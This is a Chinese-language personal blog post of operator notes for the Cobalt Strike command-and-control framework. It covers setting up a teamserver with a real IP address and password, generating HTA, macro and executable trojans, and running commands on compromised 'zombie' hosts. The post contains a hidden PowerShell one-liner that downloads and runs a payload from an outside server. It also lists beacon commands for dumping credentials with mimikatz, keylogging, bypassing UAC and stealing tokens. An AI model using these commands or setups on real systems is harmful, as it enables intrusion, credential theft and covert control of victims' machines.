<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="ShangZeng">





<title>CobaltStrike使用笔记 | ShangZeng</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML">
</script>


    


<meta name="generator" content="Hexo 4.2.0"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">ShangZeng&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                    <a class="menu-item" href="/friends">Friends</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">ShangZeng&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                    <a class="menu-item" href="/friends">Friends</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">CobaltStrike使用笔记</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">ShangZeng</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">July 24, 2020&nbsp;&nbsp;12:37:33</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/other/">other</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h3 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h3><p>由于活很杂，CS这种在实战中用的断断续续的，这里进行简单的记录。</p>
<h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p>Cobalt Strike需要Oracle Java 1.8，Oracle Java 11或OpenJDK 11的环境（看版本）。</p>
<p><strong>服务器端</strong></p>
<p>进入文件夹（VPS记得设置好出网策略），在执行前使用<em>nohup</em>或者<em>screen</em>来保持后台运行：    </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 teamserver                <span class="comment"># 权限设置 </span></span><br><span class="line">./teamserver 121.36.140.230 jljcxy  <span class="comment">#./teamserver &lt;host&gt; &lt;password&gt; [/path/to/c2.profile] [YYYY-MM-DD]</span></span><br></pre></td></tr></table></figure>

<p><strong>客户端</strong></p>
<p>win版本运行exe,其他版本：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 cobaltstrike                <span class="comment"># 权限设置 </span></span><br><span class="line">./cobaltstrike</span><br></pre></td></tr></table></figure>

<p>看到如下界面运行成功：</p>
<p><img src="https://www.shangzeng.club/WechatIMG798.png" alt="image"></p>
<h3 id="功能介绍"><a href="#功能介绍" class="headerlink" title="功能介绍"></a>功能介绍</h3><p>在上图工具栏目中，简单介绍响应的功能</p>
<h4 id="Cobalt-Strike"><a href="#Cobalt-Strike" class="headerlink" title="Cobalt Strike"></a>Cobalt Strike</h4><p>显示CS的主要功能</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>New Connection</td>
<td>新建连接，支持连接多个服务器端（防止一窝端）</td>
</tr>
<tr>
<td>Preferences</td>
<td>界面，报告，连接等等设置</td>
</tr>
<tr>
<td>Visualization</td>
<td>展示界面方式，和目标列表</td>
</tr>
<tr>
<td>VPN Interface</td>
<td>VPN接口</td>
</tr>
<tr>
<td>Listenrs</td>
<td>监听设置</td>
</tr>
<tr>
<td>Script Manager</td>
<td>脚本管理（ggressorScripts语言，扩展插件）</td>
</tr>
<tr>
<td>Close</td>
<td>关闭 ｜</td>
</tr>
</tbody></table>
<h4 id="View"><a href="#View" class="headerlink" title="View"></a>View</h4><p>显示常用的CS视图功能</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>Applications</td>
<td>显示主机信息</td>
</tr>
<tr>
<td>Preferences</td>
<td>显示所有以获取的受害主机的凭证</td>
</tr>
<tr>
<td>Downloads</td>
<td>查看下载文件</td>
</tr>
<tr>
<td>Event Log</td>
<td>查看登陆日志</td>
</tr>
<tr>
<td>Keystrokes</td>
<td>查看键盘记录结果</td>
</tr>
<tr>
<td>Proxy Pivots</td>
<td>查看代理模块</td>
</tr>
<tr>
<td>Screenshots</td>
<td>查看截屏</td>
</tr>
<tr>
<td>Script Console</td>
<td>加载第三方脚本以增强功能</td>
</tr>
<tr>
<td>Targets</td>
<td>显示所有受害主机</td>
</tr>
<tr>
<td>Web Log</td>
<td>所有Web服务的日志</td>
</tr>
</tbody></table>
<h4 id="Attacks"><a href="#Attacks" class="headerlink" title="Attacks"></a>Attacks</h4><p>用于攻击</p>
<h5 id="Packages"><a href="#Packages" class="headerlink" title="Packages"></a>Packages</h5><p>生成攻击文件</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>HTML Application</td>
<td>生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件</td>
</tr>
<tr>
<td>MS Office Macro</td>
<td>生成office宏病毒文件</td>
</tr>
<tr>
<td>Payload Generator</td>
<td>生成各种语言版本的payload</td>
</tr>
<tr>
<td>Windows Executable</td>
<td>生成可执行exe木马</td>
</tr>
<tr>
<td>Windows Executable(Stageless)</td>
<td>生成无状态的可执行exe木马</td>
</tr>
</tbody></table>
<p><strong>什么是hta(HTML Application)</strong></p>
<p>hta就是一个HTML应用程序(HTML Application)，只要你双击就能运行.在设置好hta文件路径后，在受害机执行如下代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -w hidden -c <span class="string">"IEX ((new-object net.webclient).downloadstring('http://121.36.140.230:81/shell/shell.hta'))"</span></span><br></pre></td></tr></table></figure>


<h5 id="Web-Drive-b"><a href="#Web-Drive-b" class="headerlink" title="Web Drive-b"></a>Web Drive-b</h5><p>在web服务端进行一系列的应用设置</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>Manage</td>
<td>对开启的web服务进行管理</td>
</tr>
<tr>
<td>Clone Site</td>
<td>克隆网站，可以记录受害者提交的数据</td>
</tr>
<tr>
<td>Host File</td>
<td>快速提供文件下载，可以选择Mime类型</td>
</tr>
<tr>
<td>Scripted Web Delivery</td>
<td>为payload提供web服务以便下载和执行</td>
</tr>
<tr>
<td>Signed Applet Attack</td>
<td>使用java自签名的程序进行钓鱼攻击</td>
</tr>
<tr>
<td>Smart Applet Attack</td>
<td>自动检测java版本并进行攻击</td>
</tr>
<tr>
<td>System Profiler</td>
<td>构建web服务来获取HTTP头等信息</td>
</tr>
</tbody></table>
<h4 id="Reporting"><a href="#Reporting" class="headerlink" title="Reporting"></a>Reporting</h4><p>进行相关汇报。</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>Activity Report</td>
<td>活动报告</td>
</tr>
<tr>
<td>Hosts Report</td>
<td>主机报告</td>
</tr>
<tr>
<td>Indicators of Compromise</td>
<td>IOC报告：包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes</td>
</tr>
<tr>
<td>Sessions Report</td>
<td>会话报告</td>
</tr>
<tr>
<td>Social Engineering Report</td>
<td>社会工程报告：包括鱼叉钓鱼邮件及点击记录</td>
</tr>
<tr>
<td>Tactics, Techniques, and Procedures</td>
<td>战术技术及相关程序报告：包括行动对应的每种战术的检测策略和缓解策略</td>
</tr>
<tr>
<td>Reset Data</td>
<td>重置数据</td>
</tr>
<tr>
<td>Export Data</td>
<td>导出数据，导出.tsv文件格式</td>
</tr>
</tbody></table>
<h4 id="工具图像栏目"><a href="#工具图像栏目" class="headerlink" title="工具图像栏目"></a>工具图像栏目</h4><p><img src="https://www.shangzeng.club/WechatIMG800.png" alt="image"></p>
<h3 id="使用案例"><a href="#使用案例" class="headerlink" title="使用案例"></a>使用案例</h3><p><strong>开启监听</strong></p>
<p>开启监听总共有以下几种模式（Cobalt Strike -&gt; Listeners-&gt;Add）：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Beacon HTTP</span><br><span class="line">Beacon DNS</span><br><span class="line">Beacon TCP</span><br><span class="line">Beacon HTTPS</span><br><span class="line">Beacon SMB</span><br><span class="line">Beacon C2</span><br><span class="line">Foreigin HTTP</span><br><span class="line">Foreigin HTTPS</span><br></pre></td></tr></table></figure>

<p>在选择相应的传输模式后，在进行详细设置。</p>
<p><strong>生成木马</strong></p>
<p>在开启监听后，选择自己要生成的木马类型（Attacks-&gt;Packages），选择开启的监听端口，生成木马，其中文件形式直接在受害机器运行就好，使用mshta.exe执行应当提前在目录进行设置evil.hta路径。执行命令如下：</p>
<h3 id="肉鸡操作"><a href="#肉鸡操作" class="headerlink" title="肉鸡操作"></a>肉鸡操作</h3><h4 id="interact"><a href="#interact" class="headerlink" title="interact"></a>interact</h4><p>使用命令交互，常见交互命令如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">sleep x     						<span class="comment">#调整返回时间，默认60s</span></span><br><span class="line"><span class="built_in">pwd</span>        			 				<span class="comment">#查看当钱目录</span></span><br><span class="line"><span class="built_in">help</span>        						<span class="comment">#命令说明</span></span><br><span class="line">shell xxx   						<span class="comment">#执行xxx命令 例子 shell whoami</span></span><br><span class="line">run whoami /groups                	<span class="comment"># 查看用户组</span></span><br><span class="line">runasadmin                          <span class="comment">#在高权限下执行程序 (查看提权方式)</span></span><br><span class="line">logonpasswords                      <span class="comment">#使用mimikatz转储凭据和哈希值</span></span><br><span class="line">screenshot                          <span class="comment">#屏幕截图</span></span><br></pre></td></tr></table></figure>

<p>全部命令如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Command                   Description</span><br><span class="line">    -------                   -----------</span><br><span class="line">    argue                     进程参数欺骗</span><br><span class="line">    blockdlls                 在子进程中阻止非Microsoft的DLLs文件</span><br><span class="line">    browserpivot              注入受害者浏览器进程</span><br><span class="line">    bypassuac                 绕过UAC</span><br><span class="line">    cancel                    取消正在进行的下载</span><br><span class="line">    <span class="built_in">cd</span>                        切换目录</span><br><span class="line">    checkin                   强制让被控端回连一次</span><br><span class="line">    clear                     清除beacon内部的任务队列</span><br><span class="line">    connect                   通过TCP连接到Beacon</span><br><span class="line">    covertvpn                 部署Covert VPN客户端</span><br><span class="line">    cp                        复制文件</span><br><span class="line">    dcsync                    从DC中提取密码哈希</span><br><span class="line">    desktop                   远程VNC</span><br><span class="line">    dllinject                 反射DLL注入进程</span><br><span class="line">    dllload                   使用LoadLibrary将DLL加载到进程中</span><br><span class="line">    download                  下载文件</span><br><span class="line">    downloads                 列出正在进行的文件下载</span><br><span class="line">    drives                    列出目标盘符</span><br><span class="line">    elevate                   尝试提权</span><br><span class="line">    execute                   在目标上执行程序(无输出)</span><br><span class="line">    execute-assembly          在目标上内存中执行本地.NET程序</span><br><span class="line">    <span class="built_in">exit</span>                      退出beacon</span><br><span class="line">    getprivs                  对当前令牌启用系统权限</span><br><span class="line">    getsystem                 尝试获取SYSTEM权限</span><br><span class="line">    getuid                    获取用户ID</span><br><span class="line">    hashdump                  转储密码哈希值</span><br><span class="line">    <span class="built_in">help</span>                      帮助</span><br><span class="line">    inject                    在特定进程中生成会话</span><br><span class="line">    jobkill                   杀死一个后台任务</span><br><span class="line">    <span class="built_in">jobs</span>                      列出后台任务</span><br><span class="line">    kerberos_ccache_use       从ccache文件中导入票据应用于此会话</span><br><span class="line">    kerberos_ticket_purge     清除当前会话的票据</span><br><span class="line">    kerberos_ticket_use       从ticket文件中导入票据应用于此会话</span><br><span class="line">    keylogger                 键盘记录</span><br><span class="line">    <span class="built_in">kill</span>                      结束进程</span><br><span class="line">    link                      通过命名管道连接到Beacon</span><br><span class="line">    logonpasswords            使用mimikatz转储凭据和哈希值</span><br><span class="line">    ls                        列出文件</span><br><span class="line">    make_token                创建令牌以传递凭据</span><br><span class="line">    mimikatz                  运行mimikatz</span><br><span class="line">    mkdir                     创建一个目录</span><br><span class="line">    mode dns                  使用DNS A作为通信通道(仅限DNS beacon)</span><br><span class="line">    mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)</span><br><span class="line">    mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)</span><br><span class="line">    mode http                 使用HTTP作为通信通道</span><br><span class="line">    mv                        移动文件</span><br><span class="line">    net                       net命令</span><br><span class="line">    note                      给当前目标机器备注       </span><br><span class="line">    portscan                  进行端口扫描</span><br><span class="line">    powerpick                 通过Unmanaged PowerShell执行命令</span><br><span class="line">    powershell                通过powershell.exe执行命令</span><br><span class="line">    powershell-import         导入powershell脚本</span><br><span class="line">    ppid                      为生成的post-ex任务设置父PID</span><br><span class="line">    ps                        显示进程列表</span><br><span class="line">    psexec                    使用服务在主机上生成会话</span><br><span class="line">    psexec_psh                使用PowerShell在主机上生成会话</span><br><span class="line">    psinject                  在特定进程中执行PowerShell命令</span><br><span class="line">    pth                       使用Mimikatz进行传递哈希</span><br><span class="line">    <span class="built_in">pwd</span>                       当前目录位置</span><br><span class="line">    reg                       查询注册表</span><br><span class="line">    rev2self                  恢复原始令牌</span><br><span class="line">    rm                        删除文件或文件夹</span><br><span class="line">    rportfwd                  端口转发</span><br><span class="line">    run                       在目标上执行程序(返回输出)</span><br><span class="line">    runas                     以另一个用户权限执行程序</span><br><span class="line">    runu                      在另一个PID下执行程序</span><br><span class="line">    setenv                    设置环境变量</span><br><span class="line">    shell                     cmd执行命令</span><br><span class="line">    shinject                  将shellcode注入进程</span><br><span class="line">    shspawn                   生成进程并将shellcode注入其中</span><br><span class="line">    sleep                     设置睡眠延迟时间</span><br><span class="line">    socks                     启动SOCKS4代理</span><br><span class="line">    socks stop                停止SOCKS4</span><br><span class="line">    spawn                     生成一个会话 </span><br><span class="line">    spawnas                   以其他用户身份生成会话</span><br><span class="line">    spawnto                   将可执行程序注入进程</span><br><span class="line">    spawnu                    在另一个PID下生成会话</span><br><span class="line">    ssh                       使用ssh连接远程主机</span><br><span class="line">    ssh-key                   使用密钥连接远程主机</span><br><span class="line">    steal_token               从进程中窃取令牌</span><br><span class="line">    timestomp                 将一个文件时间戳应用到另一个文件</span><br><span class="line">    unlink                    断开与Beacon的连接</span><br><span class="line">    upload                    上传文件</span><br><span class="line">    wdigest                   使用mimikatz转储明文凭据</span><br><span class="line">    winrm                     使用WinRM在主机上生成会话</span><br><span class="line">    wmi                       使用WMI在主机上生成会话</span><br></pre></td></tr></table></figure>

<h4 id="Access"><a href="#Access" class="headerlink" title="Access"></a>Access</h4><p>提供受害机器相关数据，为接下来的横向移动做准备。</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>Dump Hashes</td>
<td>下载主机哈希密码（需要管理员权限）</td>
</tr>
<tr>
<td>Elevate</td>
<td>提权？</td>
</tr>
<tr>
<td>Golden Ticket</td>
<td>黄金票据</td>
</tr>
<tr>
<td>Make Token</td>
<td>制作令牌？</td>
</tr>
<tr>
<td>One-liner</td>
<td>进行提权使用 runasadmin</td>
</tr>
<tr>
<td>run mimikatz</td>
<td>运行 mimikatz</td>
</tr>
<tr>
<td>Spawn As</td>
<td>新建账号并进行监听</td>
</tr>
</tbody></table>
<h4 id="Explore"><a href="#Explore" class="headerlink" title="Explore"></a>Explore</h4><p>探索</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>Browser Pivot</td>
<td>进行浏览器注入代理 (使用受害者浏览器)</td>
</tr>
<tr>
<td>Destop(VNC)</td>
<td>桌面连接（未实践）</td>
</tr>
<tr>
<td>File Browser</td>
<td>打开文件管理界面（进行上传下载操作）</td>
</tr>
<tr>
<td>Net View</td>
<td>查看网络</td>
</tr>
<tr>
<td>Port Scan</td>
<td>端口扫描</td>
</tr>
<tr>
<td>Process List</td>
<td>查看进程列表</td>
</tr>
<tr>
<td>Screenshot</td>
<td>截屏，在view-&gt;screenshot可见</td>
</tr>
</tbody></table>
<p><strong>关于Browser Pivot代理</strong></p>
<p>在执行命令成功后，获得代理IP端口，执行以下命令进行代理(CS 主机上面)：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chromium --on-sandbox --ignore-certificate-errors --proxy-server=127.0.0.1:9000   <span class="comment"># 之后浏览器访问直接使用受害者浏览器</span></span><br></pre></td></tr></table></figure>


<h4 id="Pivoting"><a href="#Pivoting" class="headerlink" title="Pivoting"></a>Pivoting</h4><p>用于常见的代理选项。</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>SOCKS Server</td>
<td><a href="https://www.cobaltstrike.com/help-socks-proxy-pivoting" target="_blank" rel="noopener">使用SOCKS Server 进行代理</a></td>
</tr>
<tr>
<td>Listener…</td>
<td>在受害机上进行监听（跳板）</td>
</tr>
<tr>
<td>Deploy VPN</td>
<td><a href="https://www.cobaltstrike.com/help-covert-vpn" target="_blank" rel="noopener">使用VPN代理</a></td>
</tr>
</tbody></table>
<h4 id="Spawn"><a href="#Spawn" class="headerlink" title="Spawn"></a>Spawn</h4><p><a href="https://www.cobaltstrike.com/help-spawnas" target="_blank" rel="noopener">Spawn新建账号进行监听活动</a></p>
<h4 id="Session"><a href="#Session" class="headerlink" title="Session"></a>Session</h4><table>
<thead>
<tr>
<th>选项</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>Note</td>
<td>对受害机进行笔记标注</td>
</tr>
<tr>
<td>Color</td>
<td>对受害机进行颜色标注</td>
</tr>
<tr>
<td>Remove</td>
<td>从列表中移除受害机器</td>
</tr>
<tr>
<td>Exit</td>
<td>Exit退出</td>
</tr>
</tbody></table>
<h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><p><a href>A-Team</a><br><a href>关于注入进程</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>ShangZeng</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://www.shangzeng.club/2020/07/24/CobaltStrike%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/">https://www.shangzeng.club/2020/07/24/CobaltStrike%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2020 <a href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY<strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/other/"># other</a>
                    
                        <a href="/tags/CobaltStrike/"># CobaltStrike</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/07/29/golang-%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%B7%A5%E5%85%B7-cli/">golang-命令行工具-cli</a>
            
            
            <a class="next" rel="next" href="/2020/07/16/%E5%9F%BA%E7%A1%80%E6%89%AB%E6%8F%8F%E5%99%A8%E7%BC%96%E5%86%99-NmapScan/">基础扫描器编写-NmapScan</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© ShangZeng | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
